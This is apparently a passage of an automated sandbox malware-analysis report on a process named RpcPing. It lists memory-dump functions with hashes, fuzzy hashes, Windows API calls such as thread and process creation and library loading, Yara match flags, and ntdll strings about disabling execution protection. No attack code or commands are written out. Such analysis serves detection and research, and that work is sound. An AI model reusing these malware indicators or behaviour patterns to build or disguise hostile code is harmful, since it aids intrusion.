                                  • Instruction ID: 9c50b786cb2d1e11fc4c32381661b72c676ef0383af721e4beba4a693810fad9
                                  • Opcode Fuzzy Hash: 67d9b1d0b646ccff665f0c5a951933ca25b13a2f504b43b99c567d2dd6dd6ff2
                                  • Instruction Fuzzy Hash: CC90026130140403D140B1585818606400DD7F1301F56D012E4414554CDA1989565232
                                  Function 03A52D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 22d3ed1a494afb498ef1f4fb712d31e66a5cf976bd25c3db466dc179bc5baebf
                                  • Instruction ID: d5e662a185d3d39815de16c4ea9688fbea4c9dbca10ee8208c4257e825e6dc24
                                  • Opcode Fuzzy Hash: 22d3ed1a494afb498ef1f4fb712d31e66a5cf976bd25c3db466dc179bc5baebf
                                  • Instruction Fuzzy Hash: D790026921340402D180B158580860A000D87E1202F96D416A4015558CCA1989695331
                                  Function 03A52CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 432cca2d60923c327869333c11a21b4295f043432d12917d3ddec67df525e11d
                                  • Instruction ID: 654f4f229884e969f4ef419853925a3fde64dbe55afaa74efe6e6deee2ab8fd4
                                  • Opcode Fuzzy Hash: 432cca2d60923c327869333c11a21b4295f043432d12917d3ddec67df525e11d
                                  • Instruction Fuzzy Hash: 9590027120140802D100B5985808646000D87F0301F56D012A9024555EC76989916131
                                  Function 03A52C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 370f2e8d8883ff617dd22efadcebed479fe208c4d42464ca5ced072116bcab0e
                                  • Instruction ID: cf8b2d38e9117d45902ce9bf9ca5d6601794a094d7f4cca355bc4af138730012
                                  • Opcode Fuzzy Hash: 370f2e8d8883ff617dd22efadcebed479fe208c4d42464ca5ced072116bcab0e
                                  • Instruction Fuzzy Hash: 5190027120140C42D100B1584804B46000D87F0301F56C017A4124654D8719C9517531
                                  Function 03A52C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9528fe928536b445ed6f13f5c6ac731582e297ac93858d6a51c6588a05b883a8
                                  • Instruction ID: 557bc6e27ec720b912277e7f581aa9d89a756033ad66a9a08d4b6021766fadb7
                                  • Opcode Fuzzy Hash: 9528fe928536b445ed6f13f5c6ac731582e297ac93858d6a51c6588a05b883a8
                                  • Instruction Fuzzy Hash: 9E90027120148C02D110B158880474A000D87E0301F5AC412A8424658D879989917131
                                  Function 03A535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 153237ab6b7729217e4d0387d5a8f4052743e563bd89fbc50fd379a97d3acecb
                                  • Instruction ID: b63b14434c8680ae5893c46a81964681b1bf6bb5f5be41f43a654d7be6a95941
                                  • Opcode Fuzzy Hash: 153237ab6b7729217e4d0387d5a8f4052743e563bd89fbc50fd379a97d3acecb
                                  • Instruction Fuzzy Hash: 3790027160550802D100B1584914706100D87E0201F66C412A4424568D87998A5165B2
                                  Function 03A539B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6d8555d3f5920c52be859338b7283084d427b9cfe993be1e1ac476788c1203d9
                                  • Instruction ID: dd9206eba8ac3693855e3e18e27653d16872c2db5a06e91c320dd79ce3acf13d
                                  • Opcode Fuzzy Hash: 6d8555d3f5920c52be859338b7283084d427b9cfe993be1e1ac476788c1203d9
                                  • Instruction Fuzzy Hash: 7490026124545502D150B15C4804616400DA7F0201F56C022A4814594D865989556231
                                  Function 03270855 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 640 3270855-3270870 641 3270879-32708cb call 328b810 call 3273fc0 call 3261410 call 32815d0 640->641 642 3270874 call 328ae00 640->642 651 32708ed-32708f2 641->651 652 32708cd-32708de PostThreadMessageW 641->652 642->641 652->651 653 32708e0-32708ea 652->653 653->651
                                  APIs
                                  • PostThreadMessageW.USER32(297268BLQ,00000111,00000000,00000000), ref: 032708DA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 297268BLQ$297268BLQ
                                  • API String ID: 1836367815-2296095138
                                  • Opcode ID: dceb74c4f8592c0f7bef186faaa9cf2b859688af579800afc510d983fdef8bcd
                                  • Instruction ID: 6528cd30173fb97c71c506cc5639beeb47496eaaccf4fda0bc1186cf8bafefc6
                                  • Opcode Fuzzy Hash: dceb74c4f8592c0f7bef186faaa9cf2b859688af579800afc510d983fdef8bcd
                                  • Instruction Fuzzy Hash: 0611A571D513197AEB20E790CC42FDEBB7CAF41B50F048064EA04BF2C0D6B5A6468BE5
                                  Function 03270860 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(297268BLQ,00000111,00000000,00000000), ref: 032708DA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 297268BLQ$297268BLQ
                                  • API String ID: 1836367815-2296095138
                                  • Opcode ID: 283ed2202de7eb1392f61224755bb1a0f010f6a1e0e919a1d7a5d559b516e52d
                                  • Instruction ID: 54425c5508a86333dc8e59ad0636329af8966c3ac3e78aa893782b61c01399a2
                                  • Opcode Fuzzy Hash: 283ed2202de7eb1392f61224755bb1a0f010f6a1e0e919a1d7a5d559b516e52d
                                  • Instruction Fuzzy Hash: D8018075D5135876EB21E7908C02FDEBB7CAF41B50F058054FA047F2C0E6B8A6468BE6
                                  Function 03283440 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 0328350B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: a0168e23c3ca4a787e2cf6cc4416b9776ccd1bc88f791652532e8c7cd20bc9c6
                                  • Instruction ID: df66dcbdaed104720002fa0df99138fc03c307764b9e61c9d1e74fa56931e353
                                  • Opcode Fuzzy Hash: a0168e23c3ca4a787e2cf6cc4416b9776ccd1bc88f791652532e8c7cd20bc9c6
                                  • Instruction Fuzzy Hash: 203185B5A02305BBD714EF64CC80FEBB7B8FB48714F14451DE619AB280D6B4A691CB94
                                  Function 0327EEF9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InitializeUninitialize
                                  • String ID: @J7<
                                  • API String ID: 3442037557-2016760708
                                  • Opcode ID: b6df0256b635d881fa52d3357d2e0fa42485088ef7df0e764409a18a396e256a
                                  • Instruction ID: 799404762b480a7d23320beb96d75078c1681c023226d218d081adda3297d474
                                  • Opcode Fuzzy Hash: b6df0256b635d881fa52d3357d2e0fa42485088ef7df0e764409a18a396e256a
                                  • Instruction Fuzzy Hash: 56316FB5A1020AAFDB00DFD8DC809EEB7B9FF88304B108599E505EB254D775EE458BA1
                                  Function 0327EF00 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InitializeUninitialize
                                  • String ID: @J7<
                                  • API String ID: 3442037557-2016760708
                                  • Opcode ID: 062f768d66204f41fdb077760c21eef6e6bfac988a80e7da95e0b1427a08319f
                                  • Instruction ID: 61fd50ecccbb120fba47e489dd78de493bf9267602ad189581587c766ea32c10
                                  • Opcode Fuzzy Hash: 062f768d66204f41fdb077760c21eef6e6bfac988a80e7da95e0b1427a08319f
                                  • Instruction Fuzzy Hash: 4E3150B5A1020A9FDB00DFD8C8809EFB7B9FF88304B108599E505EB254D775EE45CBA1
                                  Function 03273FC0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03274032
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 6555885b03e424912a974b2ad71a9bf35cbf2a7f4b5f4a85ec69b3e21490f823
                                  • Instruction ID: 7a1a0ba351a7b6d9db986724656c4da24872cc758e202829c70ae197c45e7539
                                  • Opcode Fuzzy Hash: 6555885b03e424912a974b2ad71a9bf35cbf2a7f4b5f4a85ec69b3e21490f823
                                  • Instruction Fuzzy Hash: 6E0121B9D5020EABDF10EBE4DC81FDDB7B8AB44208F044195E9099B281F671E795CBA1
                                  Function 032890C0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,03277D84,00000010,?,?,?,00000044,?,00000010,03277D84,?,?,?), ref: 03289123
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: f8d39a70e7a326d00996aa242ebb41c312e8b420268ed862805266e53e42b436
                                  • Instruction ID: 8e15ed15a21a1e33b43368b7dcf5ca2fb7f99c3dd8ae56bd902a81de2a3485b6
                                  • Opcode Fuzzy Hash: f8d39a70e7a326d00996aa242ebb41c312e8b420268ed862805266e53e42b436
                                  • Instruction Fuzzy Hash: EB01D6B2210108BBCB04DF99DC80EEB77ADAF8C714F008208FA09E7240D670F851CBA4
                                  Function 03269B0A Relevance: 1.5, APIs: 1, Instructions: 39threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03269B52
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 2e18b9001d6497b14de5ab2fde45fdfd86eccfe6ebd319a48636df162531b5e9
                                  • Instruction ID: 9eea3e045825a48b94e49fdfb97f0fdee6201d6b674f20a57d2f2fab45fcaa36
                                  • Opcode Fuzzy Hash: 2e18b9001d6497b14de5ab2fde45fdfd86eccfe6ebd319a48636df162531b5e9
                                  • Instruction Fuzzy Hash: 70F0E53725131436D230B29A9C02FDBB74C9F81BA0F280029F708AF3C1D9E5B58142F5
                                  Function 03269B10 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03269B52
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: a443381210444d3302903a6eaa46989f52acb116039fb11582deab163a710814
                                  • Instruction ID: c7550954016181dfb7198716b6a09cbf513fb02d85d9679a2b084811419f926f
                                  • Opcode Fuzzy Hash: a443381210444d3302903a6eaa46989f52acb116039fb11582deab163a710814
                                  • Instruction Fuzzy Hash: 93F0303725131436D220A6A99C02FA7B38C9B85661F240525FB0DEB2C0D9A5B49142A5
                                  Function 03289030 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,10A8BFB7,00000007,00000000,00000004,00000000,03273849,000000F4), ref: 0328906C
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 0b935935a9d9b665681f9f846ad136466a8349b47cf30abd535d1b6c75b0e6ef
                                  • Instruction ID: 3ba2051f41240f67dcab3b2a63e33df359cceb129f1e370ee3b02facb585ecf6
                                  • Opcode Fuzzy Hash: 0b935935a9d9b665681f9f846ad136466a8349b47cf30abd535d1b6c75b0e6ef
                                  • Instruction Fuzzy Hash: D1E06D752103047BC614EE58DC40EEB33ACEF84714F004018F909AB241C770B890CBB4
                                  Function 03288FE0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(032714E9,?,032858B7,032714E9,0328501F,032858B7,?,032714E9,0328501F,00001000,?,?,00000000), ref: 0328901F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 6f0cf94ae48c5e444ba0bc735870bf2409f609eddd7a64d5d078c79487ed6f59
                                  • Instruction ID: 756ba355ded72a9eb8594cfcfbf97648fa92c248e33ac9870b422ab6821e8fe5
                                  • Opcode Fuzzy Hash: 6f0cf94ae48c5e444ba0bc735870bf2409f609eddd7a64d5d078c79487ed6f59
                                  • Instruction Fuzzy Hash: 5CE065BA2103087FD614EF58DC40EEB73ACEF89714F004008FA08AB281C770B9608AB8
                                  Function 03277DC0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 03277DEA
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: c81a18ba6a86361fee52a62b033c367aa37e2c009ed254374633b6366196f5b8
                                  • Instruction ID: 5b305da719905e350555c2e4c3918f22f086094b34432f0153bb80db2e87f2f6
                                  • Opcode Fuzzy Hash: c81a18ba6a86361fee52a62b033c367aa37e2c009ed254374633b6366196f5b8
                                  • Instruction Fuzzy Hash: BAE0867526030427FB24E6ACDC45F7633689B4D624F1C4A60F92CDB2D1E678F5A24254
                                  Function 03277BC0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,032717E0,0328795F,0328501F,032717B0), ref: 03277BF1
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Offset: 03260000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3260000_RpcPing.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 253b9103bfca7d0944a35dff87ba77b389f5ec5bf95687bdf43f8c3e22e8b28c
                                  • Instruction ID: d9b03ee82e01193721258388d90e7024d283e572128a8c1c1e4081046237605b
                                  • Opcode Fuzzy Hash: 253b9103bfca7d0944a35dff87ba77b389f5ec5bf95687bdf43f8c3e22e8b28c
                                  • Instruction Fuzzy Hash: 41D05EB56613053BF610F7E6DC46F6A368C6B04664F084064F90CEB2C1ECA5F1A04265
                                  Function 03A52C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 812d7100c8d63216b5dd7ad9946c624dca1fc029a246bcc1b5c98ca74d18bd1e
                                  • Instruction ID: 7051a2c5d515fc14317e85144455a597994e5fa2423abe443ea48e369693c734
                                  • Opcode Fuzzy Hash: 812d7100c8d63216b5dd7ad9946c624dca1fc029a246bcc1b5c98ca74d18bd1e
                                  • Instruction Fuzzy Hash: 82B09B719015C5C5DA11E7604A0C717790867D0701F1AC477E6030641F473DC5D1E175

                                  Non-executed Functions

                                  Function 03D304DE Relevance: .2, Instructions: 152COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931753089.0000000003D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3d30000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab4a3274d02f24b338eae97451749ae2b600a7430a809f0f1744c59046019edd
                                  • Instruction ID: efea9018193f9bffc57317e4849987db1aa81f936f5e772b9da285c001295e8e
                                  • Opcode Fuzzy Hash: ab4a3274d02f24b338eae97451749ae2b600a7430a809f0f1744c59046019edd
                                  • Instruction Fuzzy Hash: D241D4B5518B0D4FD368EF689081676F3E6FF86300F50462DD98BC7252EA70D8468795
                                  Function 03D3DF79 Relevance: 57.7, Strings: 46, Instructions: 217COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931753089.0000000003D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3d30000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                  • API String ID: 0-3754132690
                                  • Opcode ID: 9220bd2dfeed275025caa9f86350a2616883af7eedbeda1a8dc1d3d7f3d6e9a2
                                  • Instruction ID: 05a5c65a407adf55f386ff258988f9919e4a771e4343ee5c6ca8c7340cb53257
                                  • Opcode Fuzzy Hash: 9220bd2dfeed275025caa9f86350a2616883af7eedbeda1a8dc1d3d7f3d6e9a2
                                  • Instruction Fuzzy Hash: C99150F04082988AC7158F54A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B95
                                  Function 03A52890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: d14dbb8c201467091f40505d5b91b245ff8a7d320cdce034b28506d5f2d6ba1e
                                  • Instruction ID: fc62d7877771202ee96959098a06c295aab3c7463eb893256c33d97d36a4974d
                                  • Opcode Fuzzy Hash: d14dbb8c201467091f40505d5b91b245ff8a7d320cdce034b28506d5f2d6ba1e
                                  • Instruction Fuzzy Hash: F051D7B6A04216BFCB15DB988990A7EF7B8BB49200714856FF865D7741D334DE408BE0
                                  Function 03AC2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 9e3b1161d54f1b208f1c9c6fcfce40777ff43594338cd1dbf9764ef57eef6b5f
                                  • Instruction ID: f2372526a957b3be4b4626cdd14a5b4d9334600ac3530e65d617d5966d4e7a58
                                  • Opcode Fuzzy Hash: 9e3b1161d54f1b208f1c9c6fcfce40777ff43594338cd1dbf9764ef57eef6b5f
                                  • Instruction Fuzzy Hash: 4851C575A10689AFDF20DF5CC990A7FF7F9EB44200B0488AFE4A6D7682D774DA408760
                                  Function 03A47630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03A84725
                                  • Execute=1, xrefs: 03A84713
                                  • ExecuteOptions, xrefs: 03A846A0
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03A84787
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03A84742
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03A846FC
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03A84655
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
